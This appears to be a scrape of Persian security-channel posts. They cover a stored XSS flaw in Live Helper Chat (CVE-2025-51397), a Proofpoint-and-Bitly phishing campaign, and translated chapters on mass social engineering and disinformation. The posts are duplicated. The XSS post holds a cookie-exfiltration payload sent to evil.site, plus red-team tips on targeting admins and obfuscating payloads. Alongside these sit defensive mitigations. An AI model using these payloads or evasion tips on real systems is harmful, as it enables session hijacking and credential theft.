> قرار دادن کدهای بیشتر برای دسترسی عمیقتر یا حمله جانبی
🩸 بررسی دقیق مسیر بهرهبرداری
> بردار حمله: ارسال پیام حاوی
> ارسال: سیستم هیچ فیلتری برای جلوگیری از اجرای اسکریپت ندارد
> تأثیر: دسترسی کامل به context مرورگر ادمین (سرقت کوکی، کیلاگ، تغییر DOM و...)
> پتانسیل: ارتقاء سطح دسترسی، Hijack نشست و نفوذ به سایر بخشها
🛡 یادداشت برای تیم آبی (مقابله با آسیبپذیری)
> بروزرسانی: Live Helper Chat را به آخرین نسخه امن ارتقاء دهید.
> ضدعفونی ورودیها: همه دادهها از کاربر در فرانت و بکاند فیلتر و escape شوند.
> سیاست امنیتی CSP: استفاده از CSP قوی برای جلوگیری از اجرای اسکریپتهای ناخواسته.
> بررسی لاگها: پیامها و اسکریپتهای مشکوک را در لاگهای چت بررسی کنید.
> آموزش پرسنل: خطرات XSS و فیشینگ از طریق پیام چت را به اپراتورها آموزش دهید.
🏴☠️ نکات مهم برای تیم قرمز
-> در XSS ذخیرهشده است؛ payload در سیستم باقی میماند.
-> کاربران با دسترسی بالا (ادمین/اپراتور) را هدف بگیرید.
-> برای دور زدن فیلترها، payload را obfuscate کنید.
-> از beacon یا اسکریپتهای exfil برای جمعآوری داده استفاده کنید.
🗂 خلاصه آسیبپذیری CVE-2025-51397
📌 نوع: XSS ذخیرهشده (Stored XSS)
💥 ماژول آسیبپذیر: چت فیسبوک (Live Helper Chat v4.60)
👤 دسترسی لازم: بدون نیاز به احراز هویت
📦 مثال حمله: alert('XSS')
🎯 خطر اصلی: اجرای کد دلخواه در مرورگر ادمین/اپراتور
🛠 راهحل: بروزرسانی فوری، فیلتر ورودیها، استفاده از CSP
🔗 منابع:
NVD | Red Hat Advisory |GitHub Advisory
✍️نویسنده
@TryHackBoxStory | The Chaos
#CVE #RED_Team #CyberSecurity #CVE2025 #XSS #LiveHelperChat
🛡 آسیبپذیری XSS ذخیرهشده در ماژول چت فیسبوک Live Helper Chat نسخه ۴.۶۰
🔥 سرتیتر آسیبپذیری
> نوع آسیبپذیری: XSS ذخیرهشده (Stored Cross-Site Scripting)
> ماژول آسیبپذیر: ماژول Facebook Chat
> نسخه آسیبپذیر: Live Helper Chat v4.60
> شناسه CVE: CVE-2025-51397
💀 توضیح آسیبپذیری
ماژول Facebook Chat در Live Helper Chat نسخه ۴.۶۰ دارای باگ XSS ذخیرهشده است.
مهاجم میتواند جاوااسکریپت مخرب را از طریق ویجت چت ارسال کند. این کد در سرور ذخیره شده و هنگام مشاهده توسط اپراتور یا ادمین اجرا میشود.
🚨 سناریوی حمله برای تیم قرمز
1. پیششرط: مهاجم به ویجت چت فیسبوک دسترسی دارد (بدون نیاز به لاگین).
2. آمادهسازی: ارسال پیام شامل payload جاوااسکریپت مثل
stealCookies().3. ماندگاری: پیام در دیتابیس ذخیره میشود.
4. اجرا: وقتی اپراتور/ادمین چت را در پنل مدیریتی باز کند،
->کد مخرب در مرورگر او اجرا میشود!
5. نتیجه:
> سرقت کوکی یا توکن نشست
> اجرای عملیات بهجای کاربر مجاز
> قرار دادن کدهای بیشتر برای دسترسی عمیقتر یا حمله جانبی
🩸 بررسی دقیق مسیر بهرهبرداری
> بردار حمله: ارسال پیام حاوی
fetch('https://evil.site/cookie?'+document.cookie)> ارسال: سیستم هیچ فیلتری برای جلوگیری از اجرای اسکریپت ندارد
> تأثیر: دسترسی کامل به context مرورگر ادمین (سرقت کوکی، کیلاگ، تغییر DOM و...)
> پتانسیل: ارتقاء سطح دسترسی، Hijack نشست و نفوذ به سایر بخشها
🛡 یادداشت برای تیم آبی (مقابله با آسیبپذیری)
> بروزرسانی: Live Helper Chat را به آخرین نسخه امن ارتقاء دهید.
> ضدعفونی ورودیها: همه دادهها از کاربر در فرانت و بکاند فیلتر و escape شوند.
> سیاست امنیتی CSP: استفاده از CSP قوی برای جلوگیری از اجرای اسکریپتهای ناخواسته.
> بررسی لاگها: پیامها و اسکریپتهای مشکوک را در لاگهای چت بررسی کنید.
> آموزش پرسنل: خطرات XSS و فیشینگ از طریق پیام چت را به اپراتورها آموزش دهید.
🏴☠️ نکات مهم برای تیم قرمز
-> در XSS ذخیرهشده است؛ payload در سیستم باقی میماند.
-> کاربران با دسترسی بالا (ادمین/اپراتور) را هدف بگیرید.
-> برای دور زدن فیلترها، payload را obfuscate کنید.
-> از beacon یا اسکریپتهای exfil برای جمعآوری داده استفاده کنید.
🗂 خلاصه آسیبپذیری CVE-2025-51397
📌 نوع: XSS ذخیرهشده (Stored XSS)
💥 ماژول آسیبپذیر: چت فیسبوک (Live Helper Chat v4.60)
👤 دسترسی لازم: بدون نیاز به احراز هویت
📦 مثال حمله: alert('XSS')
🎯 خطر اصلی: اجرای کد دلخواه در مرورگر ادمین/اپراتور
🛠 راهحل: بروزرسانی فوری، فیلتر ورودیها، استفاده از CSP
🔗 منابع:
NVD | Red Hat Advisory |GitHub Advisory
✍️نویسنده
@TryHackBoxStory | The Chaos
#CVE #RED_Team #CyberSecurity #CVE2025 #XSS #LiveHelperChat
GitHub
GitHub Advisory Database
A database of software vulnerabilities, using data from maintainer-submitted advisories and from other vulnerability databases.
🔐 هشدار حمله فیشینگ پیشرفته با استفاده از Proofpoint + Bitly
📅 گزارش از The Hacker News – جولای ۲۰۲۵
🚨 خلاصه حمله:
هکرها از ترکیب سیستم امنیتی ایمیل Proofpoint و کوتاهکننده لینک Bitly برای عبور از فیلترهای امنیتی و سرقت اطلاعات لاگین Microsoft 365 استفاده میکنند.
⚠️ چگونه حمله انجام میشود؟
ساخت لینک فیشینگ:
یک URL فیشینگ طراحی میشود (صفحه ورود جعلی مایکروسافت 365).
استفاده از Proofpoint:
لینک ابتدا از طریق زیرساخت ایمیل محافظتشده Proofpoint عبور داده میشود (مثلاً: urldefense.proofpoint.com/...).
کوتاهسازی با Bitly:
لینک نهایی با Bitly کوتاه میشود تا نشانی آن مبهم و ظاهراً بیخطر شود.
ارسال از ایمیلهای قابلاعتماد:
ایمیل حاوی لینک از یک حساب واقعی (گاهی هکشده) ارسال میشود.
🎯 هدف نهایی:
سرقت اطلاعات ورود کاربران به Microsoft 365
دور زدن فیلترهای ایمیل سازمانی و امنیتی
انجام حملات گستردهتر (Business Email Compromise)
✍️نویسنده
@TryHackBoxStory | The Chaos
#Proofpoint #News #Phishing #Microsoft
📅 گزارش از The Hacker News – جولای ۲۰۲۵
🚨 خلاصه حمله:
هکرها از ترکیب سیستم امنیتی ایمیل Proofpoint و کوتاهکننده لینک Bitly برای عبور از فیلترهای امنیتی و سرقت اطلاعات لاگین Microsoft 365 استفاده میکنند.
⚠️ چگونه حمله انجام میشود؟
ساخت لینک فیشینگ:
یک URL فیشینگ طراحی میشود (صفحه ورود جعلی مایکروسافت 365).
استفاده از Proofpoint:
لینک ابتدا از طریق زیرساخت ایمیل محافظتشده Proofpoint عبور داده میشود (مثلاً: urldefense.proofpoint.com/...).
کوتاهسازی با Bitly:
لینک نهایی با Bitly کوتاه میشود تا نشانی آن مبهم و ظاهراً بیخطر شود.
ارسال از ایمیلهای قابلاعتماد:
ایمیل حاوی لینک از یک حساب واقعی (گاهی هکشده) ارسال میشود.
🎯 هدف نهایی:
سرقت اطلاعات ورود کاربران به Microsoft 365
دور زدن فیلترهای ایمیل سازمانی و امنیتی
انجام حملات گستردهتر (Business Email Compromise)
✍️نویسنده
@TryHackBoxStory | The Chaos
#Proofpoint #News #Phishing #Microsoft
مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی
ایالات متحده در محیطی سرشار از رسانه های دیجیتال سردرگم کننده و گاه مرگبار غرق شده است. مردم درباره همه چیز، از نتایج انتخابات گرفته تا اثربخشی درمان های پزشکی، گاهی عمداً و گاهی هم ناآگاهانه اطلاعات تحریف شده و فریبکارانه پخش میکنند. رهبران سیاسی داخلی سعی میکنند با موج سواری روی این ترس و سردرگمی قدرت بیشتری به دست بیاورند، در حالی که دولت های خارجی هم با خوشحالی به شعله ورتر شدن اختلافات و نارضایتی ها دامن می زنند.
ارتباطات فریبکارانه به خوبی در شبکه های اجتماعی شرکتی جا افتاده به ویژه فیسبوک، زیرمجموعه اش اینستاگرام، و توییتر. این پلتفرم ها طوری طراحی شده اند که پیام های جلب توجه را تقویت کنند؛ فرقی نمیکند این پیامها ویدئوی بامزه گربه باشد یا آخرین پستهای تئوری توطئه QAnon. فیسبوک به طور خاص خودش را ابزار مناسبی برای ارتباطات دستکاری شده نشان داده و با داده های گسترده اش از علایق و ترجیحات ما، اطلاعاتی را به دستمان میرساند که میل ما به تایید و تصدیق را ارضا کند. مهم نیست گرایش سیاسی یا سلیقه اجتماعیات چیست؛ فیسبوک همیشه یک میم مطابق نظر تو نمایش میدهد even if the meme is bullshit (حتی اگر کاملاً بی ارزش باشد). و حتی اگر الگوریتم های فیسبوک آن پیام را به مخاطب مورد نظر نرسانند، فرستنده پیام میتواند با پرداخت مبلغ کمی، آن را به طور هدفمند برای گروهی که احتمال موافقت بیشتری دارند، تبلیغ کند.
@TryHackBoxStory
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی
ایالات متحده در محیطی سرشار از رسانه های دیجیتال سردرگم کننده و گاه مرگبار غرق شده است. مردم درباره همه چیز، از نتایج انتخابات گرفته تا اثربخشی درمان های پزشکی، گاهی عمداً و گاهی هم ناآگاهانه اطلاعات تحریف شده و فریبکارانه پخش میکنند. رهبران سیاسی داخلی سعی میکنند با موج سواری روی این ترس و سردرگمی قدرت بیشتری به دست بیاورند، در حالی که دولت های خارجی هم با خوشحالی به شعله ورتر شدن اختلافات و نارضایتی ها دامن می زنند.
ارتباطات فریبکارانه به خوبی در شبکه های اجتماعی شرکتی جا افتاده به ویژه فیسبوک، زیرمجموعه اش اینستاگرام، و توییتر. این پلتفرم ها طوری طراحی شده اند که پیام های جلب توجه را تقویت کنند؛ فرقی نمیکند این پیامها ویدئوی بامزه گربه باشد یا آخرین پستهای تئوری توطئه QAnon. فیسبوک به طور خاص خودش را ابزار مناسبی برای ارتباطات دستکاری شده نشان داده و با داده های گسترده اش از علایق و ترجیحات ما، اطلاعاتی را به دستمان میرساند که میل ما به تایید و تصدیق را ارضا کند. مهم نیست گرایش سیاسی یا سلیقه اجتماعیات چیست؛ فیسبوک همیشه یک میم مطابق نظر تو نمایش میدهد even if the meme is bullshit (حتی اگر کاملاً بی ارزش باشد). و حتی اگر الگوریتم های فیسبوک آن پیام را به مخاطب مورد نظر نرسانند، فرستنده پیام میتواند با پرداخت مبلغ کمی، آن را به طور هدفمند برای گروهی که احتمال موافقت بیشتری دارند، تبلیغ کند.
@TryHackBoxStory
دوستان کمی میپردازیم به مهندسی اجتماعی و هرکس مایل بود به تیم ما بپیوندند و این مباحث را در قالب پادکست قرار بدیم به ما پیام دهد :
@ThbxSupport
@ThbxSupport
مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش اول
این نوع ارتباطات دستکاری شده در روز ۶ ژانویه ۲۰۲۱ به اوج خشونت رسید؛ روزی که جمعیت شورشی طرفداران دونالد ترامپ ساختمان کنگره آمریکا را اشغال کردند. این جمعیت تحت تأثیر کارزار آشکار انتشار اطلاعات نادرست، به رهبری ترامپ و چند تن از متحدانش (از جمله سناتورها جاش هاولی و تد کروز)، دست به این اقدام زدند، کسانی که درباره تقلب گسترده در انتخابات ریاست جمهوری ۲۰۲۰ آمریکا ادعاهای بی اساس مطرح میکردند. این شورش در کنگره با هدف حفظ ترامپ در قدرت انجام شد. پنج نفر ،چهار نفر از شورشی ها و یک افسر پلیس کشته شدند اما گزارش ها نشان میدهد اگر شورشی ها می توانستند به اهداف مورد نظرشان برسند، از جمله معاون رئیس جمهور مایک پنس، رئیس مجلس نانسی پلوسی و نماینده کنگره الکساندریا اوکاسیوکورتز، تلفات بیشتر هم ممکن بود رخ دهد.
این واقعه مثال هشداردادنی از خطرات ارتباطات سیاسی دستکاری شده است. اما as we will argue انواع ارتباطات دستکاری شده که زمینه ساز حوادث ۶ ژانویه شدند، چیز تازه ای نیستند. به انتخابات ۲۰۱۶ ریاست جمهوری آمریکا فکر کنید؛ جایی که هیلاری کلینتون (کاندیدای دموکرات) با دونالد ترامپ (ستاره رئالیتی شوِ تبدیل شده به جمهوری خواه) رقابت داشت. اکنون دو نوع کمپین دستکاری به خوبی مستند وجود دارد که در دوره منتهی به آن انتخابات اتفاق افتاد.
اول اینکه، دولتی خارجی یعنی روسیه، تلاش کرد اعتماد مردم را به انتخابات تضعیف کند، ترامپ را به ضرر کلینتون حمایت کند و اختلافات نژادی و سیاسی میان مردم آمریکا را شدت دهد. به لطف تحقیقات متعدد، این کمپین به خوبی مستند و پیچیدگی اش برملا شده است. این عملیات شامل هک حساب های ایمیل وابسته به کمیته ملی دموکرات و کمپین کلینتون، سرقت داده ها و درز دادن آنها به طرف های ثالث همچون ویکیلیکس بود. رسانه های دولتی روسیه یعنی RT و اسپوتنیک هم در ترویج انتشار داده های افشاشده نقش داشتند.
@TryHackBoxStory
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش اول
این نوع ارتباطات دستکاری شده در روز ۶ ژانویه ۲۰۲۱ به اوج خشونت رسید؛ روزی که جمعیت شورشی طرفداران دونالد ترامپ ساختمان کنگره آمریکا را اشغال کردند. این جمعیت تحت تأثیر کارزار آشکار انتشار اطلاعات نادرست، به رهبری ترامپ و چند تن از متحدانش (از جمله سناتورها جاش هاولی و تد کروز)، دست به این اقدام زدند، کسانی که درباره تقلب گسترده در انتخابات ریاست جمهوری ۲۰۲۰ آمریکا ادعاهای بی اساس مطرح میکردند. این شورش در کنگره با هدف حفظ ترامپ در قدرت انجام شد. پنج نفر ،چهار نفر از شورشی ها و یک افسر پلیس کشته شدند اما گزارش ها نشان میدهد اگر شورشی ها می توانستند به اهداف مورد نظرشان برسند، از جمله معاون رئیس جمهور مایک پنس، رئیس مجلس نانسی پلوسی و نماینده کنگره الکساندریا اوکاسیوکورتز، تلفات بیشتر هم ممکن بود رخ دهد.
این واقعه مثال هشداردادنی از خطرات ارتباطات سیاسی دستکاری شده است. اما as we will argue انواع ارتباطات دستکاری شده که زمینه ساز حوادث ۶ ژانویه شدند، چیز تازه ای نیستند. به انتخابات ۲۰۱۶ ریاست جمهوری آمریکا فکر کنید؛ جایی که هیلاری کلینتون (کاندیدای دموکرات) با دونالد ترامپ (ستاره رئالیتی شوِ تبدیل شده به جمهوری خواه) رقابت داشت. اکنون دو نوع کمپین دستکاری به خوبی مستند وجود دارد که در دوره منتهی به آن انتخابات اتفاق افتاد.
اول اینکه، دولتی خارجی یعنی روسیه، تلاش کرد اعتماد مردم را به انتخابات تضعیف کند، ترامپ را به ضرر کلینتون حمایت کند و اختلافات نژادی و سیاسی میان مردم آمریکا را شدت دهد. به لطف تحقیقات متعدد، این کمپین به خوبی مستند و پیچیدگی اش برملا شده است. این عملیات شامل هک حساب های ایمیل وابسته به کمیته ملی دموکرات و کمپین کلینتون، سرقت داده ها و درز دادن آنها به طرف های ثالث همچون ویکیلیکس بود. رسانه های دولتی روسیه یعنی RT و اسپوتنیک هم در ترویج انتشار داده های افشاشده نقش داشتند.
@TryHackBoxStory
مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش اول
کارمندان آژانس تحقیقات اینترنتی مستقر در سنپترزبورگ با استفاده از حساب های واقعی و بات، پیام ها را در فیسبوک، اینستاگرام و توییتر گسترش دادند. آنها با موج سواری روی «جنگ میم بزرگ» فروم چن، میم های حامی ترامپ و ضد کلینتون را تقویت کردند. همچنین مأموران این آژانس خود را به جای شهروندان آمریکایی جا زدند، به گفتگوهای آنلاین فعالین Black Lives Matter و حتی مفسران محافظه کار پیوسته و گفتگوها را مصادره کردند. همه این اقدامات، در حمایت از کاندیداتوری غیرمنتظره ترامپ انجام شد که نهایتاً رئیس جمهور شد.
اما فقط بازیگران خارجی نبودند که برای دستکاری روند دموکراتیک انتخابات ۲۰۱۶ از شبکه های اجتماعی شرکتی استفاده کردند. کمپین دیگر و شناخته شده دستکاری ارتباطات از غرب نشأت میگرفت. به لطف حجم عظیم داده های موجود (و گاه به شکل غیراخلاقی گردآوری شده) از فیسبوک، شرکت ارتباطات استراتژیک Cambridge Analytica ادعا میکرد میتواند آمریکایی ها را بر اساس پارامترهای روانشناختی هدف قرار داده و نظراتشان را در شبکه های اجتماعی به طور نامحسوس تغییر دهد. تحت رهبری الکساندر نیکس (که مجله وایرد او را «نابغه» معرفی کرده بود)، Cambridge Analytica قول داده بود ویژگی های شخصیتی رأی دهنگان مدنظر را به خدمت بگیرد. کمپین ریاست جمهوری ترامپ هم با این شرکت قرارداد بست تا تبلیغات هدفمند برای تأثیرگذاری منفی بر کلینتون و به سود ترامپ بسازد و پخش کند.
البته یک نکته مهم را باید گوشزد کرد؛ هنوز بحث زیادی بر سر این است که تلاش های روسیه برای تغییر مسیر انتخابات به سوی ترامپ، یا نقش Cambridge Analytica در شکل دهی رأی، واقعاً چقدر مؤثر بوده است. در هر انتخاباتی هزاران عامل مختلف دخیل میشود و تغییرات اجتماعی را نمیتوان فقط به یک علت نسبت داد برای مثال نباید فراموش کرد که اقدامات گسترده و همیشگی برای سرکوب رأی وجود دارد یا اینکه کلینتون خودش تصمیم گرفت در انتخابات سراسری به ایالت سرنوشت ساز ویسکانسین سفر نکند. با این حال، انتخابات ۲۰۱۶ زنگ هشداری بود برای ظهور شیوه های جدید و نگران کننده ی ارتباطات دستکاری شده. و خطر این سبک ارتباطات بعد از شورش کنگره در سال ۲۰۲۱ بیشتر هم روشن شد.
@TryHackBoxStory
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش اول
کارمندان آژانس تحقیقات اینترنتی مستقر در سنپترزبورگ با استفاده از حساب های واقعی و بات، پیام ها را در فیسبوک، اینستاگرام و توییتر گسترش دادند. آنها با موج سواری روی «جنگ میم بزرگ» فروم چن، میم های حامی ترامپ و ضد کلینتون را تقویت کردند. همچنین مأموران این آژانس خود را به جای شهروندان آمریکایی جا زدند، به گفتگوهای آنلاین فعالین Black Lives Matter و حتی مفسران محافظه کار پیوسته و گفتگوها را مصادره کردند. همه این اقدامات، در حمایت از کاندیداتوری غیرمنتظره ترامپ انجام شد که نهایتاً رئیس جمهور شد.
اما فقط بازیگران خارجی نبودند که برای دستکاری روند دموکراتیک انتخابات ۲۰۱۶ از شبکه های اجتماعی شرکتی استفاده کردند. کمپین دیگر و شناخته شده دستکاری ارتباطات از غرب نشأت میگرفت. به لطف حجم عظیم داده های موجود (و گاه به شکل غیراخلاقی گردآوری شده) از فیسبوک، شرکت ارتباطات استراتژیک Cambridge Analytica ادعا میکرد میتواند آمریکایی ها را بر اساس پارامترهای روانشناختی هدف قرار داده و نظراتشان را در شبکه های اجتماعی به طور نامحسوس تغییر دهد. تحت رهبری الکساندر نیکس (که مجله وایرد او را «نابغه» معرفی کرده بود)، Cambridge Analytica قول داده بود ویژگی های شخصیتی رأی دهنگان مدنظر را به خدمت بگیرد. کمپین ریاست جمهوری ترامپ هم با این شرکت قرارداد بست تا تبلیغات هدفمند برای تأثیرگذاری منفی بر کلینتون و به سود ترامپ بسازد و پخش کند.
البته یک نکته مهم را باید گوشزد کرد؛ هنوز بحث زیادی بر سر این است که تلاش های روسیه برای تغییر مسیر انتخابات به سوی ترامپ، یا نقش Cambridge Analytica در شکل دهی رأی، واقعاً چقدر مؤثر بوده است. در هر انتخاباتی هزاران عامل مختلف دخیل میشود و تغییرات اجتماعی را نمیتوان فقط به یک علت نسبت داد برای مثال نباید فراموش کرد که اقدامات گسترده و همیشگی برای سرکوب رأی وجود دارد یا اینکه کلینتون خودش تصمیم گرفت در انتخابات سراسری به ایالت سرنوشت ساز ویسکانسین سفر نکند. با این حال، انتخابات ۲۰۱۶ زنگ هشداری بود برای ظهور شیوه های جدید و نگران کننده ی ارتباطات دستکاری شده. و خطر این سبک ارتباطات بعد از شورش کنگره در سال ۲۰۲۱ بیشتر هم روشن شد.
@TryHackBoxStory
مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش اول
سرمایه گذاری در توانمندی های دستکاری در شبکه های اجتماعی باعث شده پیام هایی که ظاهراً از طرف همسایه ها می آیند اما در واقع در روسیه ساخته شده اند، میم هایی که از گوشه های ناشناس اینترنت جمع آوری و در فیسبوک و اینستاگرام منتشر میشوند، و پست های آزمایشی که برای برانگیختن و بهره برداری از واکنش های احساسی خاص طراحی شدند، شایع شود. بسیاری از این ارتباطات دستکاری شده بر پایه جمع آوری داده ها انجام میشود و عوامل اجرایی آن با حساب های جعلی و سازمان های پوششی هویت خود را پنهان میکنند. دستکاری کنندگان به طور فردی با قربانیان تعامل میکردند و وقتی پیام هایشان توسط رسانه های بزرگتر بازنشر میشد آن را موفقیت تلقی میکردند.
ترکیب این تاکتیک های دستکاری به پدیدهای جدید به نام مهندسی اجتماعی تودهای شخصی رسیده است. ما مهندسی اجتماعی تودهای شخصی را چنین تعریف میکنیم:
یک شکل نوظهور از ارتباطات دستکاری شده که توسط قابلیت های منحصربه فرد اینترنت و پلتفرم های شبکه های اجتماعی ممکن شده است. این روش ابزارها و تکنیک های هکرها و تبلیغات چی ها، و ارتباطات فردی و جمعی را با هم ترکیب میکند تا نگرش و رفتار مخاطبان را شکل دهد. برای دستکاری، مهندسان اجتماعی تودهای شخصی دادههای هدف را جمعآوری میکنند؛ شخصیت های جعلی میسازند تا پیام ها را منتشر کنند؛ و هنگام تعامل با هدف ها، فریب و درستی و حتی خوشرویی را ترکیب میکنند تا به عمق نظام های ارتباطی نفوذ کنند. دستکاری در این مدل میتواند اهداف گوناگونی داشته باشد از تغییر عقیده و رفتار گرفته تا دلسرد کردن مردم از عمل (مثلاً رای دادن) یا تشدید باورهای قبلی مثل نژادپرستی، تبعیض جنسیتی یا دیگر اختلافات اجتماعی، اگر که این کار به نفع مهندس اجتماعی تودهای شخصی یا کارفرمایش باشد.
مهندسی اجتماعی تودهای شخصی پس از انتخابات ۲۰۱۶ تنها شدت گرفته است. با وجود تحقیقات درباره دخالت روسیه، افشاگری ها، کار رسانه های تحقیقی و حتی انحلال شرکت Cambridge Analytica، دستکاری فرآیندهای دموکراتیک توسط دولت های خارجی و مشاوران سیاسی داخلی همچنان ادامه دارد.
@TryHackBoxStory
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش اول
سرمایه گذاری در توانمندی های دستکاری در شبکه های اجتماعی باعث شده پیام هایی که ظاهراً از طرف همسایه ها می آیند اما در واقع در روسیه ساخته شده اند، میم هایی که از گوشه های ناشناس اینترنت جمع آوری و در فیسبوک و اینستاگرام منتشر میشوند، و پست های آزمایشی که برای برانگیختن و بهره برداری از واکنش های احساسی خاص طراحی شدند، شایع شود. بسیاری از این ارتباطات دستکاری شده بر پایه جمع آوری داده ها انجام میشود و عوامل اجرایی آن با حساب های جعلی و سازمان های پوششی هویت خود را پنهان میکنند. دستکاری کنندگان به طور فردی با قربانیان تعامل میکردند و وقتی پیام هایشان توسط رسانه های بزرگتر بازنشر میشد آن را موفقیت تلقی میکردند.
ترکیب این تاکتیک های دستکاری به پدیدهای جدید به نام مهندسی اجتماعی تودهای شخصی رسیده است. ما مهندسی اجتماعی تودهای شخصی را چنین تعریف میکنیم:
یک شکل نوظهور از ارتباطات دستکاری شده که توسط قابلیت های منحصربه فرد اینترنت و پلتفرم های شبکه های اجتماعی ممکن شده است. این روش ابزارها و تکنیک های هکرها و تبلیغات چی ها، و ارتباطات فردی و جمعی را با هم ترکیب میکند تا نگرش و رفتار مخاطبان را شکل دهد. برای دستکاری، مهندسان اجتماعی تودهای شخصی دادههای هدف را جمعآوری میکنند؛ شخصیت های جعلی میسازند تا پیام ها را منتشر کنند؛ و هنگام تعامل با هدف ها، فریب و درستی و حتی خوشرویی را ترکیب میکنند تا به عمق نظام های ارتباطی نفوذ کنند. دستکاری در این مدل میتواند اهداف گوناگونی داشته باشد از تغییر عقیده و رفتار گرفته تا دلسرد کردن مردم از عمل (مثلاً رای دادن) یا تشدید باورهای قبلی مثل نژادپرستی، تبعیض جنسیتی یا دیگر اختلافات اجتماعی، اگر که این کار به نفع مهندس اجتماعی تودهای شخصی یا کارفرمایش باشد.
مهندسی اجتماعی تودهای شخصی پس از انتخابات ۲۰۱۶ تنها شدت گرفته است. با وجود تحقیقات درباره دخالت روسیه، افشاگری ها، کار رسانه های تحقیقی و حتی انحلال شرکت Cambridge Analytica، دستکاری فرآیندهای دموکراتیک توسط دولت های خارجی و مشاوران سیاسی داخلی همچنان ادامه دارد.
@TryHackBoxStory
مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - پایان بخش اول
دولت روسیه همچنان تلاشش رو برای ایجاد هرج و مرج در رأی دهندگان آمریکایی با استفاده از رسانه های دیجیتال متوقف نکرده است. این آژانس ها تاکتیک های خودشان را هم در انتخابات میان دورهای ۲۰۱۸ و هم در انتخابات ریاست جمهوری ۲۰۲۰ به کار بردند.
در حالی که شرکت Cambridge Analytica منحل شده، تکنیک هایش توسط شرکت هایی مثل Phunware و Rally Forge، اغلب در خدمت اهداف محافظهوکارانه و سیاستمداران این جریان و البته گاهی توسط گروه های جناح چپ استفاده شده است. حتی پژوهشگران، بازار نوپایی از "اطلاعات غلط به عنوان سرویس" کشف کرده اند که در آن فروشندگان خدمات دستکاری رسانه دیجیتال را برای حمایت از یک جریان یا تخریب رقیب ارائه میکنند.
در مجموع، از انتخابات ۲۰۱۶ تا امروز، شکل جدیدی از ارتباطات دستکاری شده و نوع تازهای از مهندسی اجتماعی هر روز بیشتر در مرکز توجه قرار گرفته است.
@TryHackBoxStory
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - پایان بخش اول
دولت روسیه همچنان تلاشش رو برای ایجاد هرج و مرج در رأی دهندگان آمریکایی با استفاده از رسانه های دیجیتال متوقف نکرده است. این آژانس ها تاکتیک های خودشان را هم در انتخابات میان دورهای ۲۰۱۸ و هم در انتخابات ریاست جمهوری ۲۰۲۰ به کار بردند.
در حالی که شرکت Cambridge Analytica منحل شده، تکنیک هایش توسط شرکت هایی مثل Phunware و Rally Forge، اغلب در خدمت اهداف محافظهوکارانه و سیاستمداران این جریان و البته گاهی توسط گروه های جناح چپ استفاده شده است. حتی پژوهشگران، بازار نوپایی از "اطلاعات غلط به عنوان سرویس" کشف کرده اند که در آن فروشندگان خدمات دستکاری رسانه دیجیتال را برای حمایت از یک جریان یا تخریب رقیب ارائه میکنند.
در مجموع، از انتخابات ۲۰۱۶ تا امروز، شکل جدیدی از ارتباطات دستکاری شده و نوع تازهای از مهندسی اجتماعی هر روز بیشتر در مرکز توجه قرار گرفته است.
@TryHackBoxStory
مهندسی اجتماعی - مقدمه
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش دوم
چرا «مهندسی اجتماعی» عنوان مناسبی است
ما تنها کسانی نیستیم که بابت دستکاری رسانه ای نگرانیم. خیلی ها سعی دارند این شکل های جدید اطلاعات نادرست و گمراه کننده را بهتر درک کنند، ولی هنوز بر سر واژه مناسب اتفاق نظر وجود ندارد.
یکی از اصطلاحات رایج این روزها «اخبار جعلی» است. این واژه قدرت این را دارد که به سادگی، پست های حمایت شده توسط روسیه، میم های پرقدرت، و تبلیغات روانشناختی را همانطور که هستند فریبنده و گمراه کننده نام ببرد. همچنین عنوان یکی از کتاب های دانشگاهی اخیر هم این دیدگاه را دارد: شاید آنچه میبینیم یک «دروغسازی» است سیستم هایی که برای تولید دروغ و فریب دادن ما طراحی شدند.
@TryHackBoxStory
#SE@TryHackBoxStory
مقدمه: ظهور مهندسی اجتماعی توده محور و شخصی - بخش دوم
چرا «مهندسی اجتماعی» عنوان مناسبی است
ما تنها کسانی نیستیم که بابت دستکاری رسانه ای نگرانیم. خیلی ها سعی دارند این شکل های جدید اطلاعات نادرست و گمراه کننده را بهتر درک کنند، ولی هنوز بر سر واژه مناسب اتفاق نظر وجود ندارد.
یکی از اصطلاحات رایج این روزها «اخبار جعلی» است. این واژه قدرت این را دارد که به سادگی، پست های حمایت شده توسط روسیه، میم های پرقدرت، و تبلیغات روانشناختی را همانطور که هستند فریبنده و گمراه کننده نام ببرد. همچنین عنوان یکی از کتاب های دانشگاهی اخیر هم این دیدگاه را دارد: شاید آنچه میبینیم یک «دروغسازی» است سیستم هایی که برای تولید دروغ و فریب دادن ما طراحی شدند.
@TryHackBoxStory